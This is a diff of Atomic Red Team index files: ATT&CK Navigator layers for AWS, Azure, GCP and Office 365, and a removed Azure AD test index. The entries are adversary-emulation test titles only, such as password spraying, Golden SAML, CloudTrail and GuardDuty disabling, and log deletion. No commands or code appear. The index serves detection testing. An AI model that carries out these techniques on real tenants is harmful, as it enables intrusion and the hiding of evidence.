Spray an AWS using GoAWSConsoleSpray\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":1,"enabled":true,"comment":"\n- AWS - Create a new IAM user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1201","score":1,"enabled":true,"comment":"\n- Examine AWS Password Policy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"comment":"\n- AWS - Enumerate common cloud services\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1530","score":1,"enabled":true,"comment":"\n- AWS - Scan for Anonymous Access to S3\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"comment":"\n- AWS - Retrieve EC2 Password Data using stratus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1562","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":1,"enabled":true,"comment":"\n- AWS - GuardDuty Suspension or Deletion\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.008","score":7,"enabled":true,"comment":"\n- AWS - CloudTrail Changes\n- AWS - Disable CloudTrail Logging Through Event Selectors using Stratus\n- AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus\n- AWS - Remove VPC Flow Logs using Stratus\n- AWS - CloudWatch Log Group Deletes\n- AWS CloudWatch Log Stream Deletes\n- AWS - Config Logs Disabled\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1578","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578/T1578.md"}]},{"techniqueID":"T1578.001","score":1,"enabled":true,"comment":"\n- AWS - Create Snapshot from EBS Volume\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578.001/T1578.001.md"}]},{"techniqueID":"T1580","score":2,"enabled":true,"comment":"\n- AWS - EC2 Enumeration from Cloud Instance\n- AWS - EC2 Security Group Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"comment":"\n- AWS S3 Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]},{"techniqueID":"T1648","score":1,"enabled":true,"comment":"\n- Lambda Function Hijack\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1648/T1648.md"}]},{"techniqueID":"T1651","score":1,"enabled":true,"comment":"\n- AWS Run Command (and Control)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1651/T1651.md"}]}]}
{"name":"Atomic Red Team (Iaas:AWS)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Iaas:AWS) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1098","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- AWS - Create a group and add a user to that group\n"},{"techniqueID":"T1098.001","score":1,"enabled":true,"comment":"\n- AWS - Create Access Key and Secret Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.003","score":1,"enabled":true,"comment":"\n- AWS - Password Spray an AWS using GoAWSConsoleSpray\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":1,"enabled":true,"comment":"\n- AWS - Create a new IAM user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1201","score":1,"enabled":true,"comment":"\n- Examine AWS Password Policy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"comment":"\n- AWS - Enumerate common cloud services\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1530","score":1,"enabled":true,"comment":"\n- AWS - Scan for Anonymous Access to S3\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"comment":"\n- AWS - Retrieve EC2 Password Data using stratus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1562","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":1,"enabled":true,"comment":"\n- AWS - GuardDuty Suspension or Deletion\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.008","score":6,"enabled":true,"comment":"\n- AWS - CloudTrail Changes\n- AWS - Disable CloudTrail Logging Through Event Selectors using Stratus\n- AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus\n- AWS - Remove VPC Flow Logs using Stratus\n- AWS - CloudWatch Log Group Deletes\n- AWS CloudWatch Log Stream Deletes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1578","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578/T1578.md"}]},{"techniqueID":"T1578.001","score":1,"enabled":true,"comment":"\n- AWS - Create Snapshot from EBS Volume\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578.001/T1578.001.md"}]},{"techniqueID":"T1580","score":2,"enabled":true,"comment":"\n- AWS - EC2 Enumeration from Cloud Instance\n- AWS - EC2 Security Group Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"comment":"\n- AWS S3 Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]},{"techniqueID":"T1648","score":1,"enabled":true,"comment":"\n- Lambda Function Hijack\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1648/T1648.md"}]},{"techniqueID":"T1651","score":1,"enabled":true,"comment":"\n- AWS Run Command (and Control)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1651/T1651.md"}]}]}
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-azure.json
+1 -1
View File
@@ -1 +1 @@
{"name":"Atomic Red Team (Iaas:Azure)","versions":{"attack":"18","navigator":"5.3.0","layer":"4.5"},"description":"Atomic Red Team (Iaas:Azure) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Azure Persistence Automation Runbook Created or Modified\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":2,"enabled":true,"comment":"\n- Azure - adding user to Azure role in subscription\n- Azure - adding service principal to Azure role in subscription\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1526","score":2,"enabled":true,"comment":"\n- Azure - Dump Subscription Data with MicroBurst\n- Azure - Enumerate common cloud services\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":2,"enabled":true,"comment":"\n- Azure - Functions code upload - Functions code injection via Blob upload\n- Azure - Functions code upload - Functions code injection via File Share modification to retrieve the Functions identity access token\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1530","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Storage Account Objects via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Instance Metadata from Virtual Machines\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1555","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555.006","score":1,"enabled":true,"comment":"\n- Azure - Dump All Azure Key Vaults with Microburst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.006/T1555.006.md"}]},{"techniqueID":"T1562","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":1,"enabled":true,"comment":"\n- Azure - Eventhub Deletion\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1578","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578/T1578.md"}]},{"techniqueID":"T1578.001","score":1,"enabled":true,"comment":"\n- Azure - Create Snapshot from Managed Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578.001/T1578.001.md"}]},{"techniqueID":"T1619","score":3,"enabled":true,"comment":"\n- Azure - Enumerate Storage Account Objects via Shared Key authorization using Azure CLI\n- Azure - Scan for Anonymous Access to Azure Storage (Powershell)\n- Azure - Enumerate Azure Blobs with MicroBurst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]}]}
{"name":"Atomic Red Team (Iaas:Azure)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Iaas:Azure) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Azure Persistence Automation Runbook Created or Modified\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":2,"enabled":true,"comment":"\n- Azure - adding user to Azure role in subscription\n- Azure - adding service principal to Azure role in subscription\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1526","score":2,"enabled":true,"comment":"\n- Azure - Dump Subscription Data with MicroBurst\n- Azure - Enumerate common cloud services\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":2,"enabled":true,"comment":"\n- Azure - Functions code upload - Functions code injection via Blob upload\n- Azure - Functions code upload - Functions code injection via File Share modification to retrieve the Functions identity access token\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1530","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Storage Account Objects via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Instance Metadata from Virtual Machines\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1555","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555.006","score":1,"enabled":true,"comment":"\n- Azure - Dump All Azure Key Vaults with Microburst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.006/T1555.006.md"}]},{"techniqueID":"T1562","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":1,"enabled":true,"comment":"\n- Azure - Eventhub Deletion\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1578","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578/T1578.md"}]},{"techniqueID":"T1578.001","score":1,"enabled":true,"comment":"\n- Azure - Create Snapshot from Managed Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578.001/T1578.001.md"}]},{"techniqueID":"T1619","score":3,"enabled":true,"comment":"\n- Azure - Enumerate Storage Account Objects via Shared Key authorization using Azure CLI\n- Azure - Scan for Anonymous Access to Azure Storage (Powershell)\n- Azure - Enumerate Azure Blobs with MicroBurst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]}]}
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-gcp.json
+1 -1
View File
@@ -1 +1 @@
{"name":"Atomic Red Team (Iaas:GCP)","versions":{"attack":"18","navigator":"5.3.0","layer":"4.5"},"description":"Atomic Red Team (Iaas:GCP) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":2,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n- GCP - Create Custom IAM Role\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":1,"enabled":true,"comment":"\n- GCP - Delete Service Account Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1485","score":1,"enabled":true,"comment":"\n- GCP - Delete Bucket\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1562","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":1,"enabled":true,"comment":"\n- GCP - Delete Activity Event Log\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1578","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578/T1578.md"}]},{"techniqueID":"T1578.001","score":1,"enabled":true,"comment":"\n- GCP - Create Snapshot from Persistent Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578.001/T1578.001.md"}]}]}
{"name":"Atomic Red Team (Iaas:GCP)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Iaas:GCP) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":2,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n- GCP - Create Custom IAM Role\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":1,"enabled":true,"comment":"\n- GCP - Delete Service Account Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1485","score":1,"enabled":true,"comment":"\n- GCP - Delete Bucket\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1562","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":1,"enabled":true,"comment":"\n- GCP - Delete Activity Event Log\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1578","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578/T1578.md"}]},{"techniqueID":"T1578.001","score":1,"enabled":true,"comment":"\n- GCP - Create Snapshot from Persistent Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578.001/T1578.001.md"}]}]}
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json
+1 -1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
+1 -1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json
+1 -1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json
+1 -1
View File
@@ -1 +1 @@
{"name":"Atomic Red Team (Office-365)","versions":{"attack":"18","navigator":"5.3.0","layer":"4.5"},"description":"Atomic Red Team (Office-365) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1098","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.002","score":1,"enabled":true,"comment":"\n- EXO - Full access mailbox permission granted to a user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.002/T1098.002.md"}]},{"techniqueID":"T1114","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.002","score":1,"enabled":true,"comment":"\n- Office365 - Remote Mail Collected\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.002/T1114.002.md"}]},{"techniqueID":"T1114.003","score":1,"enabled":true,"comment":"\n- Office365 - Email Forwarding\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.003/T1114.003.md"}]},{"techniqueID":"T1562","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":1,"enabled":true,"comment":"\n- office-365-Disable-AntiPhishRule\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.008","score":2,"enabled":true,"comment":"\n- Office 365 - Exchange Audit Log Disabled\n- Office 365 - Set Audit Bypass For a Mailbox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1564","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.008","score":1,"enabled":true,"comment":"\n- New-Inbox Rule to Hide E-mail in M365\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.008/T1564.008.md"}]}]}
{"name":"Atomic Red Team (Office-365)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Office-365) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1098","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.002","score":1,"enabled":true,"comment":"\n- EXO - Full access mailbox permission granted to a user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.002/T1098.002.md"}]},{"techniqueID":"T1114","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.002","score":1,"enabled":true,"comment":"\n- Office365 - Remote Mail Collected\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.002/T1114.002.md"}]},{"techniqueID":"T1114.003","score":1,"enabled":true,"comment":"\n- Office365 - Email Forwarding\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.003/T1114.003.md"}]},{"techniqueID":"T1562","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":1,"enabled":true,"comment":"\n- office-365-Disable-AntiPhishRule\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.008","score":2,"enabled":true,"comment":"\n- Office 365 - Exchange Audit Log Disabled\n- Office 365 - Set Audit Bypass For a Mailbox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1564","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.008","score":1,"enabled":true,"comment":"\n- New-Inbox Rule to Hide E-mail in M365\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.008/T1564.008.md"}]}]}
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
+1 -1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
+1 -1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Indexes-CSV/azure-ad-index.csv
-22
View File
@@ -1,23 +1 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
credential-access,T1110.001,Brute Force: Password Guessing,3,Brute Force Credentials of single Azure AD user,5a51ef57-299e-4d62-8e11-2d440df55e69,powershell
credential-access,T1606.002,Forge Web Credentials: SAML token,1,Golden SAML,b16a03bc-1089-4dcc-ad98-30fe8f3a2b31,powershell
credential-access,T1110.003,Brute Force: Password Spraying,4,Password spray all Azure AD users with a single password,a8aa2d3e-1c52-4016-bc73-0f8854cfa80a,powershell
credential-access,T1110.003,Brute Force: Password Spraying,7,Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365),f3a10056-0160-4785-8744-d9bd7c12dc39,powershell
defense-evasion,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
privilege-escalation,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
privilege-escalation,T1098.003,Account Manipulation: Additional Cloud Roles,1,Azure AD - Add Company Administrator Role to a user,4d77f913-56f5-4a14-b4b1-bf7bb24298ad,powershell
privilege-escalation,T1098.003,Account Manipulation: Additional Cloud Roles,2,Simulate - Post BEC persistence via user password reset followed by user added to company administrator role,14f3af20-61f1-45b8-ad31-4637815f3f44,powershell
privilege-escalation,T1098.001,Account Manipulation: Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell
privilege-escalation,T1098.001,Account Manipulation: Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell
privilege-escalation,T1098,Account Manipulation,4,Azure AD - adding user to Azure AD role,0e65ae27-5385-46b4-98ac-607a8ee82261,powershell
privilege-escalation,T1098,Account Manipulation,5,Azure AD - adding service principal to Azure AD role,92c40b3f-c406-4d1f-8d2b-c039bf5009e4,powershell
privilege-escalation,T1098,Account Manipulation,8,Azure AD - adding permission to application,94ea9cc3-81f9-4111-8dde-3fb54f36af4b,powershell
persistence,T1098.003,Account Manipulation: Additional Cloud Roles,1,Azure AD - Add Company Administrator Role to a user,4d77f913-56f5-4a14-b4b1-bf7bb24298ad,powershell
persistence,T1098.003,Account Manipulation: Additional Cloud Roles,2,Simulate - Post BEC persistence via user password reset followed by user added to company administrator role,14f3af20-61f1-45b8-ad31-4637815f3f44,powershell
persistence,T1098.001,Account Manipulation: Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell
persistence,T1098.001,Account Manipulation: Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell
persistence,T1136.003,Create Account: Cloud Account,2,Azure AD - Create a new user,e62d23ef-3153-4837-8625-fa4a3829134d,powershell
persistence,T1136.003,Create Account: Cloud Account,3,Azure AD - Create a new user via Azure CLI,228c7498-be31-48e9-83b7-9cb906504ec8,powershell
persistence,T1098,Account Manipulation,4,Azure AD - adding user to Azure AD role,0e65ae27-5385-46b4-98ac-607a8ee82261,powershell
